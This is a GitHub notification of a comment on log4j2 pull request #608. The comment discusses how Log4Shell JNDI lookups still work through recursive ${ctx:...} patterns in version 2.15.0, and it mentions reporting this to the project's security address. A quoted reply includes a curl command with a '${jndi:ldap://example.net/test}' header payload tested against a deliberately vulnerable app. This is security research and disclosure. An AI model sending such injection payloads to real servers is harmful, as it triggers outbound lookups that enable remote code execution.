kmindi edited a comment on pull request #608: URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993542299
thx @SpComb for confirming what I found. I'm not quite sure what that means or where we should continue the discussion about that, if it's a new attack vector etc.

I just found (and this is also part of what I already reported yesterday at 22:02 CET to the security email address of the logging lib, [email protected], waiting 12h before publishing code/comments) "Variable replacement works in a recursive way." https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html

Especially concerning is what you wrote regarding 2.15.0 ...

> > Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
> >
> > Can someone confirm this?
>
> Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:
>
> The bad news: this seems to also work with 2.15.0, `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
>
> This requires a [pattern configured to use `${ctx:...}` lookups](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/resources/log4j2.properties#L15-L16) with [attacker-controlled `ThreadContext` values](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java#L20-L22), which seem to get expanded recursively.
>
> > The 2.15.x JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the 2.10.x `-Dlog4j2.formatMsgNoLookups=true` / 2.15.x https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups.
